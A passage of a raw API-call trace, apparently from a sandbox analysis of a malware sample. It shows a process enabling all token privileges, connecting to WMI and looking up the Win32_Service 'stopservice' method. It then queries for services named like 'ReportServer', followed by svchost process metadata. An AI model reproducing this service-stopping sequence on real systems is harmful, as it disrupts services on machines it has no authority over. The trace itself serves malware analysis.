(This=0x1e4c4a0) returned 0x0 [0259.777] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="UserControlService", ppInSignature=0x1cd560*=0x1e4c520, ppOutSignature=0x1cd568*=0x1e4ca20) returned 0x0 [0259.778] lstrlenW (lpString="UserControlService") returned 18 [0259.778] lstrlenW (lpString="stopservice") returned 11 [0259.778] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0259.778] IUnknown:Release (This=0x1e4c520) returned 0x0 [0259.778] IUnknown:Release (This=0x1e4ca20) returned 0x0 [0259.778] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="Create", ppInSignature=0x1cd560*=0x1e4e470, ppOutSignature=0x1cd568*=0x1e4e970) returned 0x0 [0259.778] lstrlenW (lpString="Create") returned 6 [0259.778] lstrlenW (lpString="stopservice") returned 11 [0259.778] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0259.778] IUnknown:Release (This=0x1e4e470) returned 0x0 [0259.778] IUnknown:Release (This=0x1e4e970) returned 0x0 [0259.778] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="Change", ppInSignature=0x1cd560*=0x1e4e1f0, ppOutSignature=0x1cd568*=0x1e4e6f0) returned 0x0 [0259.779] lstrlenW (lpString="Change") returned 6 [0259.779] lstrlenW (lpString="stopservice") returned 11 [0259.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0259.779] IUnknown:Release (This=0x1e4e1f0) returned 0x0 [0259.779] IUnknown:Release (This=0x1e4e6f0) returned 0x0 [0259.779] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="ChangeStartMode", ppInSignature=0x1cd560*=0x1e4c610, ppOutSignature=0x1cd568*=0x1e4cb10) returned 0x0 [0259.779] lstrlenW (lpString="ChangeStartMode") returned 15 [0259.779] lstrlenW (lpString="stopservice") returned 11 [0259.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0259.779] IUnknown:Release (This=0x1e4c610) returned 0x0 [0259.779] IUnknown:Release (This=0x1e4cb10) returned 0x0 [0259.779] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="Delete", ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x1e4c4a0) returned 0x0 [0259.779] lstrlenW (lpString="Delete") returned 6 [0259.779] lstrlenW (lpString="stopservice") returned 11 [0259.779] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0259.780] IUnknown:Release (This=0x1e4c4a0) returned 0x0 [0259.780] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="GetSecurityDescriptor", ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x1e4c640) returned 0x0 [0259.780] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0259.780] lstrlenW (lpString="stopservice") returned 11 [0259.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0259.780] IUnknown:Release (This=0x1e4c640) returned 0x0 [0259.780] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*="SetSecurityDescriptor", ppInSignature=0x1cd560*=0x1e4c520, ppOutSignature=0x1cd568*=0x1e4ca20) returned 0x0 [0259.780] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0259.780] lstrlenW (lpString="stopservice") returned 11 [0259.780] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0259.780] IUnknown:Release (This=0x1e4c520) returned 0x0 [0259.780] IUnknown:Release (This=0x1e4ca20) returned 0x0 [0259.780] IWbemClassObject:NextMethod (in: This=0x1e4bfa0, lFlags=0, pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0 | out: pstrName=0x1cd558*=0x0, ppInSignature=0x1cd560*=0x0, ppOutSignature=0x1cd568*=0x0) returned 0x40005 [0259.780] IUnknown:Release (This=0x1e4bfa0) returned 0x0 [0259.781] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.781] lstrlenW (lpString="SET") returned 3 [0259.781] lstrlenW (lpString="call") returned 4 [0259.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0259.781] lstrlenW (lpString="CREATE") returned 6 [0259.781] lstrlenW (lpString="call") returned 4 [0259.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0259.781] free (_Block=0x3e8600) [0259.781] malloc (_Size=0x8) returned 0x3ecff0 [0259.781] lstrlenW (lpString="GET") returned 3 [0259.781] lstrlenW (lpString="call") returned 4 [0259.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0259.781] lstrlenW (lpString="LIST") returned 4 [0259.781] lstrlenW (lpString="call") returned 4 [0259.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0259.781] lstrlenW (lpString="ASSOC") returned 5 [0259.781] lstrlenW (lpString="call") returned 4 [0259.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0259.781] WbemLocator:IUnknown:AddRef (This=0x1e11390) returned 0x3 [0259.781] free (_Block=0x3e6a90) [0259.781] lstrlenW (lpString="") returned 0 [0259.781] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.781] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0259.781] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.781] malloc (_Size=0x14) returned 0x3ecc40 [0259.781] lstrlenW (lpString="XDUWTFONO") returned 9 [0259.781] GetCurrentThreadId () returned 0x330 [0259.782] GetCurrentProcess () returned 0xffffffffffffffff [0259.782] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf8a0 | out: TokenHandle=0x1cf8a0*=0x298) returned 1 [0259.782] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf898 | out: TokenInformation=0x0, ReturnLength=0x1cf898) returned 0 [0259.782] malloc (_Size=0x118) returned 0x3ed0b0 [0259.782] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x3ed0b0, TokenInformationLength=0x118, ReturnLength=0x1cf898 | out: TokenInformation=0x3ed0b0, ReturnLength=0x1cf898) returned 1 [0259.782] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x3ed0b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1597268946, Attributes=0xf565), (Luid.LowPart=0x0, Luid.HighPart=4091904, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=33554434, Attributes=0xf572), (Luid.LowPart=0x0, Luid.HighPart=4063576, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000f578))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0259.782] free (_Block=0x3ed0b0) [0259.782] CloseHandle (hObject=0x298) returned 1 [0259.782] lstrlenW (lpString="GET") returned 3 [0259.782] lstrlenW (lpString="call") returned 4 [0259.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0259.782] lstrlenW (lpString="LIST") returned 4 [0259.782] lstrlenW (lpString="call") returned 4 [0259.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0259.782] lstrlenW (lpString="SET") returned 3 [0259.782] lstrlenW (lpString="call") returned 4 [0259.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0259.782] lstrlenW (lpString="CALL") returned 4 [0259.782] lstrlenW (lpString="call") returned 4 [0259.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0259.783] ??0CHString@@QEAA@XZ () returned 0x1cf850 [0259.783] GetCurrentThreadId () returned 0x330 [0259.783] malloc (_Size=0x18) returned 0x3ecc60 [0259.783] malloc (_Size=0x18) returned 0x3ecc80 [0259.783] malloc (_Size=0x18) returned 0x3ecca0 [0259.783] malloc (_Size=0x18) returned 0x3eccc0 [0259.783] malloc (_Size=0x18) returned 0x3ecce0 [0259.783] SysStringLen (param_1="\\\\") returned 0x2 [0259.783] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0259.783] malloc (_Size=0x18) returned 0x3ecd00 [0259.783] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0259.783] SysStringLen (param_1="\\") returned 0x1 [0259.783] malloc (_Size=0x18) returned 0x3ed6a0 [0259.783] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0259.783] SysStringLen (param_1="root\\cimv2") returned 0xa [0259.783] free (_Block=0x3ecd00) [0259.784] free (_Block=0x3ecce0) [0259.784] free (_Block=0x3eccc0) [0259.784] free (_Block=0x3ecca0) [0259.784] free (_Block=0x3ecc80) [0259.784] free (_Block=0x3ecc60) [0259.784] malloc (_Size=0x18) returned 0x3ecc60 [0259.784] malloc (_Size=0x18) returned 0x3ecc80 [0259.784] malloc (_Size=0x18) returned 0x3ecca0 [0259.784] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e11390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff3c29d0 | out: ppNamespace=0xff3c29d0*=0x1e23b28) returned 0x0 [0259.799] free (_Block=0x3ecca0) [0259.799] free (_Block=0x3ecc80) [0259.799] free (_Block=0x3ecc60) [0259.799] CoSetProxyBlanket (pProxy=0x1e23b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0259.800] free (_Block=0x3ed6a0) [0259.800] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0259.800] ??0CHString@@QEAA@XZ () returned 0x1cf5f8 [0259.800] GetCurrentThreadId () returned 0x330 [0259.800] malloc (_Size=0x70) returned 0x3ed0b0 [0259.800] malloc (_Size=0x50) returned 0x3ed130 [0259.800] malloc (_Size=0x50) returned 0x3ed190 [0259.800] malloc (_Size=0x70) returned 0x3ed1f0 [0259.800] malloc (_Size=0x70) returned 0x3ed270 [0259.800] malloc (_Size=0x48) returned 0x3ed2f0 [0259.800] malloc (_Size=0x18) returned 0x3ecc60 [0259.800] lstrlenA (lpString="") returned 0 [0259.800] malloc (_Size=0x2) returned 0x3e6a90 [0259.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff35314c, cbMultiByte=-1, lpWideCharStr=0x3e6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0259.800] free (_Block=0x3e6a90) [0259.800] malloc (_Size=0x70) returned 0x3ed340 [0259.800] malloc (_Size=0x48) returned 0x3ed3c0 [0259.800] malloc (_Size=0x18) returned 0x3ecc80 [0259.800] free (_Block=0x3ecc60) [0259.800] IWbemServices:GetObject (in: This=0x1e23b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1cf628*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf628*=0x1e4c030, ppCallResult=0x0) returned 0x0 [0259.818] malloc (_Size=0x18) returned 0x3ecc60 [0259.818] IWbemClassObject:GetMethod (in: This=0x1e4c030, wszName="stopservice", lFlags=0, ppInSignature=0x1cf620, ppOutSignature=0x1cf638 | out: ppInSignature=0x1cf620*=0x0, ppOutSignature=0x1cf638*=0x1e4c530) returned 0x0 [0259.818] free (_Block=0x3ecc60) [0259.818] IUnknown:Release (This=0x1e4c530) returned 0x0 [0259.818] IUnknown:Release (This=0x1e4c030) returned 0x0 [0259.819] ??0CHString@@QEAA@XZ () returned 0x1cf440 [0259.819] GetCurrentThreadId () returned 0x330 [0259.819] malloc (_Size=0x18) returned 0x3ecc60 [0259.819] lstrlenA (lpString="") returned 0 [0259.819] malloc (_Size=0x2) returned 0x3e6a90 [0259.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff35314c, cbMultiByte=-1, lpWideCharStr=0x3e6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0259.819] free (_Block=0x3e6a90) [0259.819] malloc (_Size=0x18) returned 0x3ecca0 [0259.819] lstrlenA (lpString="") returned 0 [0259.819] malloc (_Size=0x2) returned 0x3e6a90 [0259.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff35314c, cbMultiByte=-1, lpWideCharStr=0x3e6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0259.819] free (_Block=0x3e6a90) [0259.819] malloc (_Size=0x18) returned 0x3eccc0 [0259.819] free (_Block=0x3ecca0) [0259.819] malloc (_Size=0x18) returned 0x3ecca0 [0259.819] lstrlenA (lpString="SELECT * FROM ") returned 14 [0259.819] malloc (_Size=0x1e) returned 0x3ed410 [0259.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff354a40, cbMultiByte=-1, lpWideCharStr=0x3ed410, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0259.819] free (_Block=0x3ed410) [0259.819] malloc (_Size=0x18) returned 0x3ecce0 [0259.819] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0259.819] SysStringLen (param_1="Win32_Service") returned 0xd [0259.820] free (_Block=0x3ecca0) [0259.820] malloc (_Size=0x18) returned 0x3ecca0 [0259.820] malloc (_Size=0x18) returned 0x3ecd00 [0259.820] lstrlenA (lpString=" WHERE ") returned 7 [0259.820] malloc (_Size=0x10) returned 0x3ed6a0 [0259.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff353e20, cbMultiByte=-1, lpWideCharStr=0x3ed6a0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0259.820] free (_Block=0x3ed6a0) [0259.820] malloc (_Size=0x18) returned 0x3ed6a0 [0259.820] SysStringLen (param_1=" WHERE ") returned 0x7 [0259.820] SysStringLen (param_1="name like '%%ReportServer%%'") returned 0x1c [0259.820] malloc (_Size=0x18) returned 0x3ed6c0 [0259.820] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0259.820] SysStringLen (param_1=" WHERE name like '%%ReportServer%%'") returned 0x23 [0259.820] free (_Block=0x3ecce0) [0259.820] free (_Block=0x3ed6a0) [0259.820] free (_Block=0x3ecd00) [0259.820] free (_Block=0x3ecca0) [0259.820] malloc (_Size=0x18) returned 0x3ecca0 [0259.821] IWbemServices:ExecQuery (in: This=0x1e23b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'", lFlags=48, pCtx=0x0, ppEnum=0x1cf428 | out: ppEnum=0x1cf428*=0x1e23c28) returned 0x0 [0260.299] free (_Block=0x3ecca0) [0260.299] CoSetProxyBlanket (pProxy=0x1e23c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0260.302] IEnumWbemClassObject:Next (This=0x1e23c28, lTimeout=-1, uCount=0x1, apObjects=0x1cf430, puReturned=0x1cf5b8) Thread: id = 253 os_tid = 0xb88 Thread: id = 254 os_tid = 0xb84 Thread: id = 255 os_tid = 0x83c Thread: id = 256 os_tid = 0xb90 Thread: id = 257 os_tid = 0xcc Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 263 os_tid = 0xb64 Thread: id = 264 os_tid = 0xb00 Thread: id = 265 os_tid = 0xac4 Thread: id = 266 os_tid = 0x7d0 Thread: id = 267 os_tid = 0x750 Thread: id = 268 os_tid = 0x68c Thread: id = 269 os_tid = 0x680 Thread: id = 270 os_tid = 0x66c Thread: id = 271 os_tid = 0x5fc Thread: id = 272 os_tid = 0x188 Thread: id = 273 os_tid = 0x140 Thread: id = 274 os_tid = 0x128 Thread: id = 275 os_tid = 0x2b0 Thread: id = 276 os_tid = 0x218 Thread: id = 277 os_tid = 0x1cc Process: id = "33" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 279 os_tid = 0x79c Thread: id = 280 os_tid = 0x5d4 Thread: id = 281 os_tid = 0x638 Thread: id = 282 os_tid = 0x554 Thread: id = 283 os_tid = 0x720 Thread: id = 284 os_tid = 0x668 Thread: id = 285 os_tid = 0x65c Thread: id = 286 os_tid = 0x144 Thread: id = 287 os_tid = 0x110 Thread: id = 288 os_tid = 0x3f0 Thread: id = 289 os_tid = 0x3ec Thread: id = 290 os_tid = 0x3e4 Thread: id = 291 os_tid = 0x3e0 Thread: id = 292 os_tid = 0x3d0 Thread: id = 293 os_tid = 0x3cc Thread: id = 294 os_tid = 0x398 Thread: id = 295 os_tid = 0x394 Thread: id = 296 os_tid = 0x384 Thread: id = 297 os_tid = 0x380 Thread: id = 298 os_tid = 0x350 Thread: id = 299 os_tid = 0x33c